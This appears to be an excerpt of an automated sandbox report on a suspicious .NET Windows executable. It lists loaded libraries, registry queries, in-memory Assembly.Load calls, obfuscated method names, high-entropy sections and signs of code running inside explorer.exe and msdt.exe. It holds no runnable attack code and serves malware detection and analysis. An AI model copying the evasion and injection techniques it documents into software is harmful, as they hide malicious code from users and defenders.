Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains potential unpacker

Source: mQY9ka5sW6hv2Ri.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: mQY9ka5sW6hv2Ri.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msdt.pdbGCTL source: mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771720567.00000000010F0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000006.00000002.4091465372.0000000000870000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771924925.0000000001160000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000006.00000003.1771716252.00000000046B8000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000006.00000003.1773310292.0000000004863000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000006.00000002.4092239644.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000006.00000002.4092239644.0000000004A10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: mQY9ka5sW6hv2Ri.exe, mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771924925.0000000001160000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000006.00000003.1771716252.00000000046B8000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000006.00000003.1773310292.0000000004863000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000006.00000002.4092239644.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000006.00000002.4092239644.0000000004A10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771720567.00000000010F0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, msdt.exe, 00000006.00000002.4091465372.0000000000870000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

Source: mQY9ka5sW6hv2Ri.exe, OptionsWindow.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, xAjfVuKcAf4Og71LT4.cs	.Net Code: SAsiXBqbo5 System.Reflection.Assembly.Load(byte[])
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, xAjfVuKcAf4Og71LT4.cs	.Net Code: SAsiXBqbo5 System.Reflection.Assembly.Load(byte[])
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, xAjfVuKcAf4Og71LT4.cs	.Net Code: SAsiXBqbo5 System.Reflection.Assembly.Load(byte[])
Source: 5.2.explorer.exe.1143f840.0.raw.unpack, OptionsWindow.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 6.2.msdt.exe.4f5f840.3.raw.unpack, OptionsWindow.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_07925F98 push eax; mov dword ptr [esp], ecx	0_2_07925F9C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_0794A468 pushad ; iretd	0_2_0794A475
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 0_2_0794BBC1 push esp; retf	0_2_0794BBCD
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00417884 push esp; iretd	4_2_0041788A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041E140 push ebx; ret	4_2_0041E2DC
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00416958 push ebx; retf	4_2_0041695A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041AAE6 push AD0710D7h; ret	4_2_0041AAED
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0040E2AD push edi; ret	4_2_0040E2B6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00416AB9 push 6DD8D03Bh; retf	4_2_00416ABF
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041A3B2 push eax; ret	4_2_0041A3B4
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041D4B5 push eax; ret	4_2_0041D508
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041D56C push eax; ret	4_2_0041D572
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041D502 push eax; ret	4_2_0041D508
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041D50B push eax; ret	4_2_0041D572
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_00417741 push 00000072h; retf	4_2_0041776D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0041771C push edx; ret	4_2_00417728
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_004077A4 pushfd ; retf	4_2_004077AE
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0116225F pushad ; ret	4_2_011627F9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011627FA pushad ; ret	4_2_011627F9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011909AD push ecx; mov dword ptr [esp], ecx	4_2_011909B6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0116283D push eax; iretd	4_2_01162858
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01161368 push eax; iretd	4_2_01161369
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8C6B02 push esp; retn 0000h	5_2_0E8C6B03
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8C6B1E push esp; retn 0000h	5_2_0E8C6B1F
Source: C:\Windows\explorer.exe	Code function: 5_2_0E8C69B5 push esp; retn 0000h	5_2_0E8C6AE7
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6BBB02 push esp; retn 0000h	5_2_0F6BBB03
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6BBB1E push esp; retn 0000h	5_2_0F6BBB1F
Source: C:\Windows\explorer.exe	Code function: 5_2_0F6BB9B5 push esp; retn 0000h	5_2_0F6BBAE7
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBF9B5 push esp; retn 0000h	5_2_0FBBFAE7
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBFB1E push esp; retn 0000h	5_2_0FBBFB1F
Source: C:\Windows\explorer.exe	Code function: 5_2_0FBBFB02 push esp; retn 0000h	5_2_0FBBFB03

Source: mQY9ka5sW6hv2Ri.exe

Static PE information: section name: .text entropy: 7.955074705738379

Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, AcmBDkmm30oEvpwIly.cs	High entropy of concatenated method names: 'rhOp8b8cbh', 'HJvpLip2Y1', 'dckpcnpuM4', 'R3Sp91ZPsJ', 'X0UpBMVKNw', 'dVIpukQPWg', 'xmCpee0gtd', 'dAMpVYZpwp', 'FYPpry6AZf', 'cTSp5oR7m9'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, xAjfVuKcAf4Og71LT4.cs	High entropy of concatenated method names: 'hU1bwi4PvH', 'OklbNQp3Uu', 'ObNbWagt0V', 'ES1bM8t9jq', 'vTRbvkOvrg', 'pOYbKjSl6c', 'xAebf3BmDZ', 'I6jbxlX6MM', 'YQFbqkdY4y', 'vcHb7Sv5WH'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, eOKRCaoe3fhH3gYZFB.cs	High entropy of concatenated method names: 'HyXKwI3iyo', 'IKcKW7pA3L', 'L0XKv7tSYB', 'mseKfTLj14', 'GcsKxSbVhx', 'metvZcKaKl', 'cPKv0MtKf8', 'FBevgZi9LQ', 'LnavDfgYPr', 'XDcvYLm0Os'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, xAZT7rRNi7CIxwkhSs.cs	High entropy of concatenated method names: 'nVKfJJecJ5', 'lBqfRRrGYa', 'utSfXt2PoB', 'UyqfdcNgJf', 'wrIfPb16aZ', 'qMffoI9vS6', 'Os7fAJ4TSb', 'BI0fyGh842', 'yEOfkeWvpe', 'd7ofEiQdjW'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, PkyUxHhb0mm11LKqcJ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'j8BGYBsa3D', 'WjpG6gc4e7', 'KgFGzibWF6', 'csYbTSOs50', 'JiwbSgKmux', 'tENbGo3v2Z', 'pnpbbfCxRD', 'uJbmmFhsFyEmOnMWQ31'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, CRgmFmrWJuwbjNi6aB.cs	High entropy of concatenated method names: 'vFFfNYgyGQ', 'eFGfMKlN8K', 'yAPfK7TUok', 'QbTK6eVety', 'luxKz6nwmI', 'j8lfTcMTM2', 'MH8fSMDw37', 'NrOfGovrGH', 'oBdfbhnQ7p', 'FwqfibxeGA'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, En1UhvAG0Xg43a3j3af.cs	High entropy of concatenated method names: 'o5GhJuqOv1', 'cDZhRF9cJf', 'JZZhXCbDTZ', 'Js4hdjIISW', 'u8ghP42nBF', 'nrahoFtvjj', 'BHBhAtgVfM', 'sEmhyhn40q', 'IV5hkiQPwB', 'tYRhEaKIqv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, GVRvFJpS4eaHdtKgN8.cs	High entropy of concatenated method names: 'uAjvPDvuly', 'aJovAyYaCU', 'JIKMu5uaNE', 'NNGMeI7pk3', 'HGAMVEmeka', 'H2HMrkxdnk', 'LwfM5THrI1', 'inFMjW2Tfa', 'mcVMsHDUXU', 'myrM8CbApQ'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, kZKWDRIFgoibh1hb2T.cs	High entropy of concatenated method names: 'ToString', 'z8N4aeZC4f', 'sm54B0PkF1', 'Jau4uc1jOy', 'MEa4etyCDG', 'Q1F4VlCy56', 'VZP4rdcIu4', 'H5G45PqSR7', 'xnV4jyvSsD', 'P5w4sKOVHw'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, Ek4LhktCeUZ4vOf7Ua.cs	High entropy of concatenated method names: 'hEXMdybeRd', 'TdjMo19niM', 'VnpMyvPWr9', 'r8WMk8fw89', 'vTTMpMUjh1', 'i0tM478XTt', 'H61MnWHv4R', 'K3fMmqfnxd', 'BDEMhwmJVf', 'b1FM2f9ZmF'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, pocZvdWaYcBDH0pnRC.cs	High entropy of concatenated method names: 'e2WIyxLImo', 'wQtIkNaHH0', 'xkoItbKgxl', 'GyiIB6R5cf', 'kjvIeJvYjr', 'PYKIVIX4vU', 'piqI5a4yvv', 'u4AIjAdES3', 'vWyI882UV9', 'AnqIaxYNVf'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, i4UKlxTbGliEA9DbaS.cs	High entropy of concatenated method names: 'QHchSwSjwi', 'skJhbk9wQp', 'nx8hih9ELx', 'HRYhNAOsGY', 'MwxhWoHpmC', 'bfehv3MNqx', 'lw9hKfyhmg', 'miWmgAl2U9', 'KInmDmGLsu', 'zfkmY2tplv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, QWExWLAqoGuZC75pehx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gHQ2cDU1Mg', 'hdy29JQByg', 'liQ21Q157d', 'o7d2UHsmkO', 'Xk02ZcZjn5', 'iFf20V2dfw', 'HfI2gPvV6r'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, QdNndQQ6nZ5EJDtnt1.cs	High entropy of concatenated method names: 'XGLWcmVP03', 'q1AW9O8PmB', 'n5lW17bxna', 'mNXWUSxLpE', 'lgHWZV0Nro', 'OkZW0ecwnx', 'HjBWgfP61l', 'PhNWDqX4rW', 'B0iWYp8Q3q', 'giwW6gFBfv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, ktsjOqgCZu1GFFowlH.cs	High entropy of concatenated method names: 'MJnmtHT1Eq', 'FGRmBsLcdj', 'uQcmuD8ItA', 'KSamegy3V9', 'ztrmc0WvyS', 'fOGmVoLmTu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, WXrH4jVeKlucQK3169.cs	High entropy of concatenated method names: 'SELXO9ywk', 'TiZdl4BXI', 'hvVoagmbT', 'JumAQmALo', 'ns7kAGc1w', 's89E6F5B5', 'h4ZvHTIxB0TlueTR65', 'sfTDkQXVfeHdYw1hVl', 'G6CmgMdXj', 'nhJ2Jk5DJ'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, FBTy3x8mprisgqbcUr.cs	High entropy of concatenated method names: 'bNCnDsop60', 'KHIn6lR7dR', 'uiWmTPrr1J', 'z6YmSceVt0', 'WKfnaeYlVx', 'D80nLVpJEC', 'A91nQIDkel', 'jWYncWn5Dt', 'LhFn9usQar', 'YvUn1XBmWC'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, YaIgQIyAUXnF75o8tN.cs	High entropy of concatenated method names: 'Aw4mN4bEYN', 'd3NmWLfbwr', 'F8pmMyFJZS', 'w8EmvjXKvw', 'SxXmKCfb6p', 'YIdmfUsHPM', 'PVHmxCMiCs', 'Km2mqgBNkS', 'DMXm7shkCG', 'xfTmFE21gZ'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, VBD99jHbNBN6seWpOy.cs	High entropy of concatenated method names: 'Dispose', 'sEuSYB5Cf2', 's16GBKj9IJ', 'doMHHGdMq3', 'Qw9S6B4tWJ', 'f8ySzbBWGy', 'ProcessDialogKey', 'Hm5GTlqf2e', 'eoLGSlCGZe', 'J77GGe8KcY'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, P1L7kyMMcEp8en6UhP.cs	High entropy of concatenated method names: 'zRiK1IGB9f', 'PA7KUCK26n', 'wVmKZ1APG3', 'ToString', 'XpxK0Robnm', 'vo4KgualDF', 'E27BHysRRy7McdrhL9I', 'CxShFWsrvV6YGvsAXbM'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, g2Zqnh36w0L7u7l6kJ.cs	High entropy of concatenated method names: 'qk5SfQ5AqH', 'RGUSxirRrN', 'RVwS7HvruL', 'BnFSFWtEeK', 'bbmSprcDb2', 'uRuS49SRSO', 'bwyrDYplvcPytTLjoN', 'ARfBeN1UyL5mDnReuL', 'cNeSS4iFjJ', 'hCNSbkry63'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, bS4Vc8AV0HcgkuQItZG.cs	High entropy of concatenated method names: 'Wkk2JDYcLU', 'tiB2RFUT8I', 'gSw2X2XGsZ', 'sDa9pB7ds4VmovDFeMM', 'KInGwJ7Fg4WQN3TCxOF', 'kvxq6f7p2tScaSYQ9oc', 'sl83bw71f25LExvBtxO'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, xavLmCzdnYGj8CDZxw.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MuahIjLKFc', 'rDWhppcb4S', 'hv0h4RdxLN', 'nCyhnD3Djk', 'sI8hmiLiyk', 'UY5hh3NOVy', 'SI9h2aotwA'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, AcmBDkmm30oEvpwIly.cs	High entropy of concatenated method names: 'rhOp8b8cbh', 'HJvpLip2Y1', 'dckpcnpuM4', 'R3Sp91ZPsJ', 'X0UpBMVKNw', 'dVIpukQPWg', 'xmCpee0gtd', 'dAMpVYZpwp', 'FYPpry6AZf', 'cTSp5oR7m9'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, xAjfVuKcAf4Og71LT4.cs	High entropy of concatenated method names: 'hU1bwi4PvH', 'OklbNQp3Uu', 'ObNbWagt0V', 'ES1bM8t9jq', 'vTRbvkOvrg', 'pOYbKjSl6c', 'xAebf3BmDZ', 'I6jbxlX6MM', 'YQFbqkdY4y', 'vcHb7Sv5WH'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, eOKRCaoe3fhH3gYZFB.cs	High entropy of concatenated method names: 'HyXKwI3iyo', 'IKcKW7pA3L', 'L0XKv7tSYB', 'mseKfTLj14', 'GcsKxSbVhx', 'metvZcKaKl', 'cPKv0MtKf8', 'FBevgZi9LQ', 'LnavDfgYPr', 'XDcvYLm0Os'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, xAZT7rRNi7CIxwkhSs.cs	High entropy of concatenated method names: 'nVKfJJecJ5', 'lBqfRRrGYa', 'utSfXt2PoB', 'UyqfdcNgJf', 'wrIfPb16aZ', 'qMffoI9vS6', 'Os7fAJ4TSb', 'BI0fyGh842', 'yEOfkeWvpe', 'd7ofEiQdjW'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, PkyUxHhb0mm11LKqcJ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'j8BGYBsa3D', 'WjpG6gc4e7', 'KgFGzibWF6', 'csYbTSOs50', 'JiwbSgKmux', 'tENbGo3v2Z', 'pnpbbfCxRD', 'uJbmmFhsFyEmOnMWQ31'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, CRgmFmrWJuwbjNi6aB.cs	High entropy of concatenated method names: 'vFFfNYgyGQ', 'eFGfMKlN8K', 'yAPfK7TUok', 'QbTK6eVety', 'luxKz6nwmI', 'j8lfTcMTM2', 'MH8fSMDw37', 'NrOfGovrGH', 'oBdfbhnQ7p', 'FwqfibxeGA'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, En1UhvAG0Xg43a3j3af.cs	High entropy of concatenated method names: 'o5GhJuqOv1', 'cDZhRF9cJf', 'JZZhXCbDTZ', 'Js4hdjIISW', 'u8ghP42nBF', 'nrahoFtvjj', 'BHBhAtgVfM', 'sEmhyhn40q', 'IV5hkiQPwB', 'tYRhEaKIqv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, GVRvFJpS4eaHdtKgN8.cs	High entropy of concatenated method names: 'uAjvPDvuly', 'aJovAyYaCU', 'JIKMu5uaNE', 'NNGMeI7pk3', 'HGAMVEmeka', 'H2HMrkxdnk', 'LwfM5THrI1', 'inFMjW2Tfa', 'mcVMsHDUXU', 'myrM8CbApQ'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, kZKWDRIFgoibh1hb2T.cs	High entropy of concatenated method names: 'ToString', 'z8N4aeZC4f', 'sm54B0PkF1', 'Jau4uc1jOy', 'MEa4etyCDG', 'Q1F4VlCy56', 'VZP4rdcIu4', 'H5G45PqSR7', 'xnV4jyvSsD', 'P5w4sKOVHw'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, Ek4LhktCeUZ4vOf7Ua.cs	High entropy of concatenated method names: 'hEXMdybeRd', 'TdjMo19niM', 'VnpMyvPWr9', 'r8WMk8fw89', 'vTTMpMUjh1', 'i0tM478XTt', 'H61MnWHv4R', 'K3fMmqfnxd', 'BDEMhwmJVf', 'b1FM2f9ZmF'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, pocZvdWaYcBDH0pnRC.cs	High entropy of concatenated method names: 'e2WIyxLImo', 'wQtIkNaHH0', 'xkoItbKgxl', 'GyiIB6R5cf', 'kjvIeJvYjr', 'PYKIVIX4vU', 'piqI5a4yvv', 'u4AIjAdES3', 'vWyI882UV9', 'AnqIaxYNVf'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, i4UKlxTbGliEA9DbaS.cs	High entropy of concatenated method names: 'QHchSwSjwi', 'skJhbk9wQp', 'nx8hih9ELx', 'HRYhNAOsGY', 'MwxhWoHpmC', 'bfehv3MNqx', 'lw9hKfyhmg', 'miWmgAl2U9', 'KInmDmGLsu', 'zfkmY2tplv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, QWExWLAqoGuZC75pehx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gHQ2cDU1Mg', 'hdy29JQByg', 'liQ21Q157d', 'o7d2UHsmkO', 'Xk02ZcZjn5', 'iFf20V2dfw', 'HfI2gPvV6r'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, QdNndQQ6nZ5EJDtnt1.cs	High entropy of concatenated method names: 'XGLWcmVP03', 'q1AW9O8PmB', 'n5lW17bxna', 'mNXWUSxLpE', 'lgHWZV0Nro', 'OkZW0ecwnx', 'HjBWgfP61l', 'PhNWDqX4rW', 'B0iWYp8Q3q', 'giwW6gFBfv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, ktsjOqgCZu1GFFowlH.cs	High entropy of concatenated method names: 'MJnmtHT1Eq', 'FGRmBsLcdj', 'uQcmuD8ItA', 'KSamegy3V9', 'ztrmc0WvyS', 'fOGmVoLmTu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, WXrH4jVeKlucQK3169.cs	High entropy of concatenated method names: 'SELXO9ywk', 'TiZdl4BXI', 'hvVoagmbT', 'JumAQmALo', 'ns7kAGc1w', 's89E6F5B5', 'h4ZvHTIxB0TlueTR65', 'sfTDkQXVfeHdYw1hVl', 'G6CmgMdXj', 'nhJ2Jk5DJ'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, FBTy3x8mprisgqbcUr.cs	High entropy of concatenated method names: 'bNCnDsop60', 'KHIn6lR7dR', 'uiWmTPrr1J', 'z6YmSceVt0', 'WKfnaeYlVx', 'D80nLVpJEC', 'A91nQIDkel', 'jWYncWn5Dt', 'LhFn9usQar', 'YvUn1XBmWC'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, YaIgQIyAUXnF75o8tN.cs	High entropy of concatenated method names: 'Aw4mN4bEYN', 'd3NmWLfbwr', 'F8pmMyFJZS', 'w8EmvjXKvw', 'SxXmKCfb6p', 'YIdmfUsHPM', 'PVHmxCMiCs', 'Km2mqgBNkS', 'DMXm7shkCG', 'xfTmFE21gZ'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, VBD99jHbNBN6seWpOy.cs	High entropy of concatenated method names: 'Dispose', 'sEuSYB5Cf2', 's16GBKj9IJ', 'doMHHGdMq3', 'Qw9S6B4tWJ', 'f8ySzbBWGy', 'ProcessDialogKey', 'Hm5GTlqf2e', 'eoLGSlCGZe', 'J77GGe8KcY'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, P1L7kyMMcEp8en6UhP.cs	High entropy of concatenated method names: 'zRiK1IGB9f', 'PA7KUCK26n', 'wVmKZ1APG3', 'ToString', 'XpxK0Robnm', 'vo4KgualDF', 'E27BHysRRy7McdrhL9I', 'CxShFWsrvV6YGvsAXbM'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, g2Zqnh36w0L7u7l6kJ.cs	High entropy of concatenated method names: 'qk5SfQ5AqH', 'RGUSxirRrN', 'RVwS7HvruL', 'BnFSFWtEeK', 'bbmSprcDb2', 'uRuS49SRSO', 'bwyrDYplvcPytTLjoN', 'ARfBeN1UyL5mDnReuL', 'cNeSS4iFjJ', 'hCNSbkry63'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, bS4Vc8AV0HcgkuQItZG.cs	High entropy of concatenated method names: 'Wkk2JDYcLU', 'tiB2RFUT8I', 'gSw2X2XGsZ', 'sDa9pB7ds4VmovDFeMM', 'KInGwJ7Fg4WQN3TCxOF', 'kvxq6f7p2tScaSYQ9oc', 'sl83bw71f25LExvBtxO'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, xavLmCzdnYGj8CDZxw.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MuahIjLKFc', 'rDWhppcb4S', 'hv0h4RdxLN', 'nCyhnD3Djk', 'sI8hmiLiyk', 'UY5hh3NOVy', 'SI9h2aotwA'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, AcmBDkmm30oEvpwIly.cs	High entropy of concatenated method names: 'rhOp8b8cbh', 'HJvpLip2Y1', 'dckpcnpuM4', 'R3Sp91ZPsJ', 'X0UpBMVKNw', 'dVIpukQPWg', 'xmCpee0gtd', 'dAMpVYZpwp', 'FYPpry6AZf', 'cTSp5oR7m9'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, xAjfVuKcAf4Og71LT4.cs	High entropy of concatenated method names: 'hU1bwi4PvH', 'OklbNQp3Uu', 'ObNbWagt0V', 'ES1bM8t9jq', 'vTRbvkOvrg', 'pOYbKjSl6c', 'xAebf3BmDZ', 'I6jbxlX6MM', 'YQFbqkdY4y', 'vcHb7Sv5WH'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, eOKRCaoe3fhH3gYZFB.cs	High entropy of concatenated method names: 'HyXKwI3iyo', 'IKcKW7pA3L', 'L0XKv7tSYB', 'mseKfTLj14', 'GcsKxSbVhx', 'metvZcKaKl', 'cPKv0MtKf8', 'FBevgZi9LQ', 'LnavDfgYPr', 'XDcvYLm0Os'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, xAZT7rRNi7CIxwkhSs.cs	High entropy of concatenated method names: 'nVKfJJecJ5', 'lBqfRRrGYa', 'utSfXt2PoB', 'UyqfdcNgJf', 'wrIfPb16aZ', 'qMffoI9vS6', 'Os7fAJ4TSb', 'BI0fyGh842', 'yEOfkeWvpe', 'd7ofEiQdjW'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, PkyUxHhb0mm11LKqcJ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'j8BGYBsa3D', 'WjpG6gc4e7', 'KgFGzibWF6', 'csYbTSOs50', 'JiwbSgKmux', 'tENbGo3v2Z', 'pnpbbfCxRD', 'uJbmmFhsFyEmOnMWQ31'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, CRgmFmrWJuwbjNi6aB.cs	High entropy of concatenated method names: 'vFFfNYgyGQ', 'eFGfMKlN8K', 'yAPfK7TUok', 'QbTK6eVety', 'luxKz6nwmI', 'j8lfTcMTM2', 'MH8fSMDw37', 'NrOfGovrGH', 'oBdfbhnQ7p', 'FwqfibxeGA'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, En1UhvAG0Xg43a3j3af.cs	High entropy of concatenated method names: 'o5GhJuqOv1', 'cDZhRF9cJf', 'JZZhXCbDTZ', 'Js4hdjIISW', 'u8ghP42nBF', 'nrahoFtvjj', 'BHBhAtgVfM', 'sEmhyhn40q', 'IV5hkiQPwB', 'tYRhEaKIqv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, GVRvFJpS4eaHdtKgN8.cs	High entropy of concatenated method names: 'uAjvPDvuly', 'aJovAyYaCU', 'JIKMu5uaNE', 'NNGMeI7pk3', 'HGAMVEmeka', 'H2HMrkxdnk', 'LwfM5THrI1', 'inFMjW2Tfa', 'mcVMsHDUXU', 'myrM8CbApQ'
